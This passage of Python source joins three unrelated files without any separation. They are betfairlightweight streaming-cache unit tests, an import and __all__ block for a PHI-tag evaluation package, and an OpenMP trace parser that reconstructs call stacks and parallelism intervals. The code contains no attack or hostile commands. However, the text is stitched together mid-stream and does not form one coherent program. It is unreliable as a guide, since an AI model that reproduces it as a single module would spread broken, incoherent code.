publish_time = mock.Mock() market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE_md.json') book_data = market_change.json().get('mc') for book in book_data: self.market_book_cache.update_cache(book, publish_time) mock_strip_datetime.assert_called_with(publish_time) assert self.market_book_cache.market_definition == book.get('marketDefinition') @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.strip_datetime') def test_update_cache_tv(self, mock_strip_datetime): publish_time = mock.Mock() market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE_tv.json') book_data = market_change.json().get('mc') for book in book_data: self.market_book_cache.update_cache(book, publish_time) mock_strip_datetime.assert_called_with(publish_time) assert self.market_book_cache.total_matched == book.get('tv') # @mock.patch('betfairlightweight.resources.streamingresources.MarketBookCache.strip_datetime') # def test_update_cache_rc(self, mock_strip_datetime): # publish_time = mock.Mock() # market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE.json') # book_data = market_change.json().get('mc') # # for book in book_data: # self.market_book_cache.update_cache(book, publish_time) # mock_strip_datetime.assert_called_with(publish_time) # # assert self.market_book_cache.total_matched == book.get('tv') @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.serialise') @mock.patch('betfairlightweight.streaming.cache.MarketDefinition') 
@mock.patch('betfairlightweight.streaming.cache.MarketBook') def test_create_resource(self, mock_market_book, mock_market_definition, mock_serialise): # lightweight market_book = self.market_book_cache.create_resource(1234, {}, True) assert market_book == mock_serialise # not lightweight market_book = self.market_book_cache.create_resource(1234, {}, False) assert market_book == mock_market_book() def test_update_runner_dict(self): assert self.market_book_cache.runner_dict == {} class Runner: def __init__(self, selection_id, name, handicap): self.selection_id = selection_id self.name = name self.handicap = handicap (a, b) = (Runner(123, 'a', 1.25), Runner(456, 'b', -0.25)) self.market_book_cache.runners = [a, b] self.market_book_cache._update_runner_dict() assert self.market_book_cache.runner_dict == {(123, 1.25): a, (456, -0.25): b} def test_init_multiple_rc(self): # Initialize data with multiple rc entries for the same selection data = {'marketDefinition': {'runners': {}}} data['rc'] = [{'atb': [[1.01, 200]], 'id': 13536143}, {'atl': [[1000.0, 200]], 'id': 13536143}] market_book_cache = MarketBookCache(**data) assert len(market_book_cache.runners) == len(market_book_cache.runner_dict) class TestRunnerBook(unittest.TestCase): def setUp(self): self.runner_book = RunnerBook(**{'id': 123}) def test_update_traded(self): self.mock_traded = mock.Mock() self.runner_book.traded = self.mock_traded self.runner_book.update_traded([]) self.mock_traded.clear.assert_called_with() self.runner_book.update_traded([1, 2]) self.mock_traded.update.assert_called_with([1, 2]) def test_serialise_back(self): mock_available_to_back = mock.Mock() mock_available_to_back.prices = True mock_best_available_to_back = mock.Mock() mock_best_available_to_back.prices = True mock_best_display_available_to_back = mock.Mock() mock_best_display_available_to_back.prices = True self.runner_book.available_to_back = mock_available_to_back assert self.runner_book.serialise_available_to_back() == mock_available_to_back.serialise mock_available_to_back.prices = False self.runner_book.best_available_to_back = mock_best_available_to_back assert self.runner_book.serialise_available_to_back() == mock_best_available_to_back.serialise mock_best_available_to_back.prices = False self.runner_book.best_display_available_to_back = mock_best_display_available_to_back assert self.runner_book.serialise_available_to_back() == mock_best_display_available_to_back.serialise def test_serialise_lay(self): mock_available_to_lay = mock.Mock() mock_available_to_lay.prices = True mock_best_available_to_lay = mock.Mock() mock_best_available_to_lay.prices = True mock_best_display_available_to_lay = mock.Mock() mock_best_display_available_to_lay.prices = True self.runner_book.available_to_lay = mock_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_available_to_lay.serialise mock_available_to_lay.prices = False self.runner_book.best_available_to_lay = mock_best_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_best_available_to_lay.serialise mock_best_available_to_lay.prices = False self.runner_book.best_display_available_to_lay = mock_best_display_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_best_display_available_to_lay.serialise def test_empty_serialise(self): runner_definition = { 'bdp': None, } serialise_d = self.runner_book.serialise(runner_definition) ex = serialise_d['ex'] # all empty lists assert all(not ex[a] for a in ex.keys()) sp = serialise_d['sp'] # all 'None' 
or empty lists assert all(not sp[a] for a in sp.keys()) class TestOrderBookCache(unittest.TestCase): def setUp(self): self.order_book_cache = OrderBookCache(**{}) self.runner = mock.Mock() self.runner.selection_id = 10895629 self.runner.serialise_orders = mock.Mock(return_value=[]) self.order_book_cache.runners = [self.runner] def test_update_cache(self): mock_response = create_mock_json('tests/resources/streaming_ocm_UPDATE.json') for order_book in mock_response.json().get('oc'): self.order_book_cache.update_cache(order_book, 1234) for order_changes in order_book.get('orc'): # self.runner.matched_lays.update.assert_called_with(order_changes.get('ml', [])) # self.runner.matched_backs.update.assert_called_with(order_book.get('mb', [])) self.runner.update_unmatched.assert_called_with(order_changes.get('uo', [])) @mock.patch('betfairlightweight.streaming.cache.OrderBookRunner') def test_update_cache_new(self, mock_order_book_runner): self.runner.selection_id = 108956 mock_response = create_mock_json('tests/resources/streaming_ocm_UPDATE.json') for order_book in mock_response.json().get('oc'): self.order_book_cache.update_cache(order_book, 1234) for order_changes in order_book.get('orc'): mock_order_book_runner.assert_called_with(**order_changes) @mock.patch('betfairlightweight.streaming.cache.OrderBookCache.serialise') @mock.patch('betfairlightweight.streaming.cache.CurrentOrders') def test_create_resource(self, mock_current_orders, mock_serialise): current_orders = self.order_book_cache.create_resource(123, {}, False) assert current_orders == mock_current_orders() def test_runner_dict(self): class Runner: def __init__(self, selection_id, name): self.selection_id = selection_id self.name = name (a, b) = (Runner(123, 'a'), Runner(456, 'b')) self.order_book_cache.runners = [a, b] assert self.order_book_cache.runner_dict == {123: a, 456: b} def test_serialise(self): serialised = self.order_book_cache.serialise assert serialised == {'currentOrders': [], 'moreAvailable': False} class TestOrderBookRunner(unittest.TestCase): def setUp(self): self.order_book_runner = OrderBookRunner(**{'id': 1, 'ml': [], 'mb': [], 'uo': []}) class TestUnmatchedOrder(unittest.TestCase): def setUp(self): order = { 'id': 1, 'p': 2, 's': 3, 'side': 'L', 'status': 'E', 'pt': 'L', 'ot': 'L', 'pd': 8, 'sm': 9, 'sr': 10, 'sl': 11, 'sc': 12, 'sv': 13, 'rfo': 14, 'rfs': 15, 'ld': 16, 'lsrc': 17, 'error': 'test' } self.unmatched_order = UnmatchedOrder(**order) def test_init(self): assert self.unmatched_order.bet_id == 1 assert self.unmatched_order.price == 2 assert self.unmatched_order.size == 3 assert self.unmatched_order.side == 'L' assert self.unmatched_order.status == 'E' assert self.unmatched_order.persistence_type == 'L' assert self.unmatched_order.order_type == 'L' assert self.unmatched_order.placed_date == BaseResource.strip_datetime(8) assert self.unmatched_order.size_matched == 9 assert self.unmatched_order.size_remaining == 10 assert self.unmatched_order.size_lapsed == 11 assert self.unmatched_order.size_cancelled == 12 assert self.unmatched_order.size_voided == 13 assert self.unmatched_order.reference_order == 14 assert self.unmatched_order.reference_strategy == 15 assert self.unmatched_order.lapsed_date == 16 assert self.unmatched_order.lapse_status_reason_code == 17 def test_placed_date_string(self): now = datetime.datetime.now() self.unmatched_order.placed_date = now assert self.unmatched_order.placed_date_string == now.strftime('%Y-%m-%dT%H:%M:%S.%fZ') def test_matched_date_string(self): now = 
datetime.datetime.now() self.unmatched_order.matched_date = now assert self.unmatched_order.matched_date_string == now.strftime('%Y-%m-%dT%H:%M:%S.%fZ') def test_serialise(self): assert self.unmatched_order.serialise('1.23', 12345, 0.0) == { 'sizeLapsed': 11, 'persistenceType': 'LAPSE', 'sizeRemaining': 10, 'placedDate': '1970-01-01T00:00:00.008000Z', 'sizeVoided': 13, 'sizeCancelled': 12, 'betId': 1, 'customerOrderRef': 14, 'orderType': 'LIMIT', 'marketId': '1.23', 'matchedDate': None, 'side': 'LAY', 'selectionId': 12345, 'bspLiability': None, 'sizeMatched': 9, 'handicap': 0.0, 'averagePriceMatched': 0.0, 'status': 'EXECUTABLE', 'customerStrategyRef': 15, 'regulatorCode': None, 'priceSize': {'price': 2, 'size': 3} } __all__ = ["PHITag", "NameTag", "ProfessionTag", "LocationTag", "AgeTag", "DateTag", "ContactTag", "IDTag", "OtherTag", "StandoffAnnotation", "EvaluatePHI", "TokenSequence", "Token", "PHITokenSequence", "PHIToken", "evaluate", "get_predicate_function"] from tags import PHITag from tags import NameTag, ProfessionTag, LocationTag, AgeTag, DateTag from tags import ContactTag, IDTag, OtherTag from classes import StandoffAnnotation, EvaluatePHI from classes import TokenSequence, Token, PHITokenSequence, PHIToken from evaluate import evaluate, get_predicate_function from enum import Enum, auto from copy import copy from collections import defaultdict from PfgUtil import debug_mode import logging import time class EntityType(Enum): STACKFRAME = auto() SYNC_REGION = auto() TASK_REGION = auto() IMPLICIT_TASK_REGION = auto() THREAD = auto() TASK_PERIOD = auto() PARALLEL_REGION = auto() TASK_CREATION = auto() WORK = auto() """ Each construct that is extracted from the tracefile is an Entity An entity has a type, a CPU, a start and an end time, along with other type-specific information TODO this could perhaps be merged with the PFGTree data structures (e.g. PFGTreeNodeExecutionInterval) with some effort """ class Entity: def __init__(self, entity_type, identifier, cpu, start, end): self.entity_type = entity_type self.identifier = identifier # this is used differently depending on the type self.cpu = cpu self.start = start self.end = end self.depth = None self.group = None self.task_id = None self.parent_id = None self.pregion_num_threads = 0 # only used for parallel region type self.parallelism_intervals = defaultdict(int) self.per_cpu_intervals = defaultdict(int) self.per_cpu_top_of_stack_intervals = defaultdict(int) self.top_of_stack_parallelism_intervals = defaultdict(int) self.per_cpu_top_of_stack_parallelism_intervals = {} self.parent_entity = None self.child_entities = [] def add_parallelism_interval(self, parallelism, interval, cpu): self.per_cpu_intervals[cpu] += interval self.parallelism_intervals[parallelism] += interval def add_top_of_stack_interval(self, interval, cpu): self.per_cpu_top_of_stack_intervals[cpu] += interval def add_top_of_stack_parallelism_interval(self, parallelism, interval): self.top_of_stack_parallelism_intervals[parallelism+1] += interval # TODO what does this mean? each CPU has it's own top_of_stack parallelism interval? 
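# A minimal, self-contained sketch (illustrative only; this helper is not part of
# the original module) of how the interval accumulators above behave:
# parallelism_intervals maps an observed parallelism level to the total time spent
# at that level, while per_cpu_intervals attributes the same time to the CPU that
# observed it, mirroring add_parallelism_interval.
def _sketch_interval_accumulation():
    from collections import defaultdict
    parallelism_intervals = defaultdict(int)
    per_cpu_intervals = defaultdict(int)
    # e.g. 100 time units at parallelism 2 on CPU 0, 50 at parallelism 4 on CPU 1,
    # then another 25 at parallelism 2 on CPU 0
    for parallelism, interval, cpu in [(2, 100, 0), (4, 50, 1), (2, 25, 0)]:
        parallelism_intervals[parallelism] += interval
        per_cpu_intervals[cpu] += interval
    return dict(parallelism_intervals), dict(per_cpu_intervals)
    # returns ({2: 125, 4: 50}, {0: 125, 1: 50})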
def add_per_cpu_top_of_stack_parallelism_interval(self, parallelism, interval, cpu): if cpu not in self.per_cpu_top_of_stack_parallelism_intervals: self.per_cpu_top_of_stack_parallelism_intervals[cpu] = defaultdict(int) self.per_cpu_top_of_stack_parallelism_intervals[cpu][parallelism+1] += interval import subprocess def file_len(fname): p = subprocess.Popen(['wc', '-l', fname], stdout=subprocess.PIPE, stderr=subprocess.PIPE) result, err = p.communicate() if p.returncode != 0: raise IOError(err) return int(result.strip().split()[0]) def parse_trace(filename): logging.debug("Parsing the tracefile %s.", filename) entries = [] exits = [] frames = set() tasks = {} unique_groups = set() max_depth = 0 max_cpu = -1 main_cpu = -1 min_timestamp = -1 max_timestamp = -1 num_lines = file_len(filename) with open(filename, 'r') as f: line_idx = -1 for line in f: line_idx += 1 if line.strip() == "": continue if line_idx % int(num_lines/10.0) == 0: logging.debug("Parsed line %d of %d.", line_idx+1, num_lines) split_line = line.strip().split(",") cpu = int(split_line[1]) if cpu > max_cpu: max_cpu = cpu if split_line[0] == "period": # i.e. stack frame period! period_start = int(split_line[2]) period_end = int(split_line[3]) frame_id = split_line[4] parent_frame_id = split_line[5] frame_start = int(split_line[6]) frame_end = int(split_line[7]) if min_timestamp == -1 or frame_start < min_timestamp: min_timestamp = frame_start if max_timestamp == -1 or frame_end > max_timestamp: max_timestamp = frame_end depth = int(split_line[8]) symbol = ",".join(split_line[9:]) # ignoring openmp outlining function calls if "outlined" in symbol: continue if "main" in symbol and main_cpu == -1: main_cpu = cpu if symbol not in unique_groups: unique_groups.add(symbol) if frame_id in frames: # This is a period of a frame we've seen before, for now I can just ignore it pass else: # This is a period of a new frame! 
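# (Field layout of a "period" record, as decoded above: [0]=record type, [1]=cpu,
# [2]=period start, [3]=period end, [4]=frame id, [5]=parent frame id,
# [6]=frame start, [7]=frame end, [8]=depth, [9:]=symbol; the symbol may itself
# contain commas, hence the join over the remaining fields.)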
frames.add(frame_id) stack_frame = Entity(EntityType.STACKFRAME, frame_id, cpu, frame_start, frame_end) stack_frame.depth = depth stack_frame.group = symbol stack_frame.parent_id = parent_frame_id entries.append(stack_frame) exits.append(stack_frame) elif split_line[0] == "task_creation": continue # currently ignoring symbol_addr = int(split_line[3]) parent_task_id = int(split_line[4]) new_task_id = int(split_line[5]) timestamp = int(split_line[2]) tcreate = Entity(EntityType.TASK_CREATION, new_task_id, cpu, timestamp, 0) tcreate.group = symbol_addr tcreate.parent_id = parent_task_id entries.append(tcreate) elif split_line[0] == "parallel_region": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) num_threads = int(split_line[4]) pregion = Entity(EntityType.PARALLEL_REGION, None, cpu, start, end) pregion.pregion_num_threads = num_threads entries.append(pregion) exits.append(pregion) elif split_line[0] == "task_period": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) task_id = split_line[2] period_start = int(split_line[5]) period_end = int(split_line[6]) start = int(split_line[3]) end = int(split_line[4]) prior_task_id = int(split_line[7]) # currently unused openmp_task_id = int(split_line[8]) if task_id in tasks: # This is a period of a frame we've seen before task_region = tasks[task_id] # create entry and exits task_period = Entity(EntityType.TASK_PERIOD, openmp_task_id, cpu, period_start, period_end) task_period.group = split_line[0] task_period.task_id = task_id entries.append(task_period) exits.append(task_period) else: task_region = Entity(EntityType.TASK_REGION, openmp_task_id, cpu, start, end+1) # add one cycle so we delete the task after we process its final period task_region.group = split_line[0] task_region.task_id = task_id tasks[task_id] = task_region entries.append(task_region) exits.append(task_region) # also make a period start/end for the first period of this task region task_period = Entity(EntityType.TASK_PERIOD, openmp_task_id, cpu, period_start, period_end) task_period.group = split_line[0] task_period.task_id = task_id task_period.parent_id = prior_task_id entries.append(task_period) exits.append(task_period) elif split_line[0] == "implicit_task": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) if "omp_forked_execution" not in unique_groups: unique_groups.add("omp_forked_execution") start = int(split_line[2]) end = int(split_line[3]) task_region = Entity(EntityType.IMPLICIT_TASK_REGION, None, cpu, start, end) task_region.group = split_line[0] entries.append(task_region) exits.append(task_region) elif split_line[0] == "sync_region": if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) sync_region = Entity(EntityType.SYNC_REGION, None, cpu, start, end) sync_region.group = split_line[0] entries.append(sync_region) exits.append(sync_region) elif split_line[0] == "thread": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) thread = Entity(EntityType.THREAD, None, cpu, start, end) thread.group = split_line[0] entries.append(thread) exits.append(thread) elif split_line[0] == "work": if "omp_parallel_loop" not in unique_groups: unique_groups.add("omp_parallel_loop") start = int(split_line[2]) end 
= int(split_line[3]) work = Entity(EntityType.WORK, None, cpu, start, end) work.group = split_line[0] work.identifier = int(split_line[4]) # if 1 then it means it's a LOOP work callback work.count = int(split_line[5]) # number of threads in the work team entries.append(work) exits.append(work) else: logging.error("Cannot parse line: %s", line); raise ValueError() logging.debug("Sorting the entries and exits") entries.sort(key=lambda x: x.start) exits.sort(key=lambda x: x.end) logging.debug("Finished parsing the tracefile %s.", filename) return entries, exits, unique_groups, max_cpu, main_cpu, min_timestamp, max_timestamp def get_next_entity(entries, exits, entry_idx, exit_idx): is_exit = None next_entity = None if entry_idx >= len(entries) and exit_idx >= len(exits): return None, None, entry_idx, exit_idx elif entry_idx >= len(entries): is_exit = True # i.e. it is an exit next_entity = exits[exit_idx] exit_idx += 1 elif exit_idx >= len(exits): is_exit = False # i.e. it is an entry next_entity = entries[entry_idx] entry_idx += 1 else: # which one is first? next_entry = entries[entry_idx] next_exit = exits[exit_idx] if next_entry.start < next_exit.end: is_exit = False next_entity = next_entry entry_idx += 1 else: is_exit = True next_entity = exits[exit_idx] exit_idx += 1 return is_exit, next_entity, entry_idx, exit_idx def process_entry(entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, max_depth): if entity.entity_type == EntityType.STACKFRAME: # find the correct callstack and push this frame to it # once I have the correct callstack, I simply add this new one as a child of the top of the callstack logging.trace("%d:wanting to push:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: top_level_entities.append(entity) else: entity.parent_entity = call_stack[-1] call_stack[-1].child_entities.append(entity) call_stack.append(entity) if len(call_stack) > max_depth[0]: max_depth[0] = len(call_stack) logging.trace("%d:pushed to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group,entity.entity_type, entity) elif entity.entity_type == EntityType.SYNC_REGION: # (swap this CPU's callstack to the runtime callstack?) # TODO runtime-time (or synchronisation-time) should be recorded separately to work-time for each entity pass elif entity.entity_type == EntityType.TASK_REGION: # do nothing, let the changes to CPU state happen on task period pass elif entity.entity_type == EntityType.TASK_PERIOD: # I need to swap this CPU's state to the callstack corresponding to the task instance entered_task_id = entity.identifier if entered_task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I entered it.", entered_task_id) raise ValueError() current_call_stack_per_cpu[entity.cpu].append(entered_task_id) logging.trace("%d:created new stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) elif entity.entity_type == EntityType.WORK: if entity.identifier != 1: logging.error("Currently only support loop work-callbacks. Cannot handle the work type: %s", entity.identifier) raise NotImplementedError() # if this CPU is not in parallel execution mode (i.e. 
the CPU's callstack is 'init') # then this should create a separate callstack for this CPU call_stack = None if len(current_call_stack_per_cpu[entity.cpu]) == 0: call_stack = saved_call_stacks["init"] else: call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] # copy the current sequential call stack duplicate_call_stack = copy(call_stack) # create a CPU specific one so that CPU-specific callstacks are correctly handled nested_level = 0 for stack_name in current_call_stack_per_cpu[entity.cpu]: if "omp_thread_" in stack_name: nested_level += 1 saved_call_stacks["omp_thread_" + str(entity.cpu) + "_" + str(nested_level)] = duplicate_call_stack current_call_stack_per_cpu[entity.cpu].append("omp_thread_" + str(entity.cpu) + "_" + str(nested_level)) logging.trace("%d:created new stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) if nested_level == 0: # append this entity as a pseudo call entity.group = "omp_parallel_loop" stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] entity.parent_entity = stack[-1] stack[-1].child_entities.append(entity) stack.append(entity) if len(stack) > max_depth[0]: max_depth[0] = len(stack) logging.trace("%d:pushed new loop work to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) # if the CPU is already in parallel execution, then this implicit task region is sequential so does not matter # assuming no nested parallel regions! elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: # currently doing nothing, for for-loops I'm conisdering the work itself to announce parallel execution # if the CPU is already in parallel execution, then this implicit task region is sequential so does not matter pass elif entity.entity_type == EntityType.THREAD: logging.trace("%d:new thread:%s:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: # create a new call stack within saved_call_stacks call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] duplicate_call_stack = copy(call_stack) # these should refer to the same entities created_task_id = entity.identifier saved_call_stacks[created_task_id] = duplicate_call_stack else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() def process_exit(entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, exits, exit_idx): if entity.entity_type == EntityType.STACKFRAME: # find the correct callstack and remove the top frame (they should be the same frame!) 
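# (Summary of the roll-back handling below: saved call stacks are shallow copies
# that share Entity objects, so the frame being exited may still sit beneath newer
# frames in the other stacks recorded for this CPU. Those newer frames are truncated
# to end at this exit time, and freshly started duplicates are pushed back and wired
# into the exits list, so each saved stack remains a consistent snapshot.)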
call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: logging.error("Processing stack frame exit and there was no entity on top of stack,") raise ValueError() top_of_stack = call_stack[-1] if top_of_stack is not entity: logging.error("Processing stack frame exit and it was not top of stack.") raise ValueError() # each of these stacks has a separate roll back to replace the disconnected entity saved_rolled_back_entity_stacks = {} # first in last out # so we don't duplicate the same thing multiple times, save each one that we duplicate common across the stacks unique_rolled_back_entities = {} rolled_back_entities = False if not (entity.group == top_of_stack.group and entity.end == top_of_stack.end): rolled_back_entities = True # now find all the stacks that have the entity we have just left for stack_name in current_call_stack_per_cpu[entity.cpu]: temp_call_stack = saved_call_stacks[stack_name] if entity in temp_call_stack: rolled_back_entities = [] roll_back_idx = -1 while(True): if temp_call_stack[roll_back_idx] is entity: # this is gauranteed to happen at some point before roll_back_idx goes out of bounds # if it is already the top of this stack, do nothing # if we are processing replacements, we will pop it later break else: dup_identifier = temp_call_stack[roll_back_idx].group + "_" + str(temp_call_stack[roll_back_idx].end) if dup_identifier in unique_rolled_back_entities: rolled_back_entities.append(unique_rolled_back_entities[dup_identifier]) else: # duplicate the entity and change it's end time to now duplicated_entity = copy(temp_call_stack[roll_back_idx]) duplicated_entity.child_entities = [] duplicated_entity.parent_entity = [] duplicated_entity.parallelism_intervals = [] duplicated_entity.start = entity.end temp_call_stack[roll_back_idx].end = entity.end rolled_back_entities.append(duplicated_entity) unique_rolled_back_entities[dup_identifier] = duplicated_entity logging.trace("Processing disconnect: looking for exit associated with %s:%s:%s", temp_call_stack[roll_back_idx].group, temp_call_stack[roll_back_idx].start, temp_call_stack[roll_back_idx].identifier) if temp_call_stack[roll_back_idx].group == "omp_forked_execution": # there is no exit to replace roll_back_idx -= 1 continue roll_back_idx -= 1 # go forward in the exits array and replace the original entity's exit with the duplicated one # TODO this is really inefficient, I should simply have a reference to the exit in the entry data structure tmp_exit_idx = exit_idx while(True): if exits[tmp_exit_idx] is temp_call_stack[-1]: exits[tmp_exit_idx] = duplicated_entity break else: tmp_exit_idx += 1 saved_rolled_back_entity_stacks[stack_name] = rolled_back_entities # either the top of the stack was the entity, or we have rolled back some entities # first, we need to pop the entity if rolled_back_entities == False: call_stack.pop() else: # now remove the top of each stack where the entity is the top, then roll out the duplicate entities to replace the subtree for stack_name, duplicate_entities in saved_rolled_back_entity_stacks.items(): stack = saved_call_stacks[stack_name] # remove the ended entity stack.pop() # this happens even if nothing was rolled back in this stack (i.e. 
the entity was already at the top of the call stack) # replace the subtree for duplicate_entity in reversed(duplicate_entities): if len(stack) == 0: top_level_entities.append(duplicate_entity) else: duplicate_entity.parent_entity = stack[-1] stack[-1].child_entities.append(duplicate_entity) stack.append(duplicate_entity) duplicate_entity.depth = len(stack) logging.trace("%d:popped from stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) elif entity.entity_type == EntityType.SYNC_REGION: pass elif entity.entity_type == EntityType.TASK_REGION: # if the region is over, I can remove the instance from the saved call stacks task_id = entity.identifier if task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I exited the task.", task_id) raise ValueError() del saved_call_stacks[task_id] elif entity.entity_type == EntityType.TASK_PERIOD: # stop executing on this call stack by popping it (it still exists in saved_call_stacks to come back to later) left_task_id = entity.identifier if left_task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I exited one of its task periods.", left_task_id) raise ValueError() if current_call_stack_per_cpu[entity.cpu][-1] != left_task_id: logging.error("Processing task exit and it was not top of stack.") raise ValueError() if len(current_call_stack_per_cpu[entity.cpu]) > 1: logging.trace("%d:deleted stack:%s:returning to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], current_call_stack_per_cpu[entity.cpu][-2], entity.group, entity.entity_type, entity) else: logging.trace("%d:deleted stack:%s:returning to no active stack:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) current_call_stack_per_cpu[entity.cpu].pop() elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif entity.entity_type == EntityType.WORK: logging.trace("%d:leaving work:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) # remove the omp_parallel_loop from the current stack call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: logging.error("Exiting work entity, and there is no entity on top of stack,") raise ValueError() top_of_stack = call_stack[-1] if top_of_stack is not entity: logging.error("Processing work entity exit, and it was not top of stack.") raise ValueError() # for OpenMP for-loops, once the work region is finished, we can kill the call stack nested_level = 0 for stack_name in current_call_stack_per_cpu[entity.cpu]: if "omp_thread_" in stack_name: nested_level += 1 nested_level -= 1 # we are removing the nested level before if nested_level == 0: call_stack.pop() # remove the parallel loop entity del saved_call_stacks["omp_thread_" + str(entity.cpu) + "_" + str(nested_level)] current_call_stack_per_cpu[entity.cpu].pop() elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() def update_parallelism_intervals_for_cpu( is_start, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_time_per_cpu, main_cpu): logging.trace("Updating intervals for a %s event.", ("start" if is_start else "end")) updated_processed_time = 
(entity.start if is_start else entity.end) previous_processed_time = previous_processed_time_per_cpu[entity.cpu] if previous_processed_time != -1: stack_ids = current_call_stack_per_cpu[entity.cpu] if len(stack_ids) > 0: call_stack_id = stack_ids[-1] call_stack = saved_call_stacks[call_stack_id] # Each CPU should have all of its entities assigned the interval interval = updated_processed_time - previous_processed_time top_of_stack = True for stack_entity in reversed(call_stack): stack_entity.add_parallelism_interval(prior_parallelism, interval, entity.cpu) if top_of_stack: #stack_entity.add_per_cpu_top_of_stack_parallelism_interval(prior_parallelism, interval, entity.cpu) stack_entity.add_top_of_stack_parallelism_interval(prior_parallelism, interval) #stack_entity.add_top_of_stack_interval(interval, entity.cpu) top_of_stack = False if "omp_parallel_loop" in stack_entity.group and entity.cpu != main_cpu: break updated_processed_times_per_cpu = previous_processed_time_per_cpu updated_processed_times_per_cpu[entity.cpu] = updated_processed_time return updated_processed_times_per_cpu def update_parallelism_intervals_on_entry( entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu): # We don't need to update the parallelism intervals if the parallelism isn't changing updated_processed_times_per_cpu = previous_processed_times_per_cpu updated_parallelism = prior_parallelism if entity.entity_type == EntityType.STACKFRAME: # update the parallelism interval before we change the top of the stack updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) elif entity.entity_type == EntityType.SYNC_REGION: # update the parallelism interval before we got to this region updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu][-1] work_state_stack_per_cpu[entity.cpu].append(False) if current_work_state == True: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 elif entity.entity_type == EntityType.TASK_REGION: pass elif entity.entity_type == EntityType.TASK_PERIOD: # TODO pass elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif entity.entity_type == EntityType.WORK: # update the parallelism interval before we got to this region updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu][-1] work_state_stack_per_cpu[entity.cpu].append(True) if current_work_state == False: # going from work to non work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() return updated_parallelism, updated_processed_times_per_cpu def 
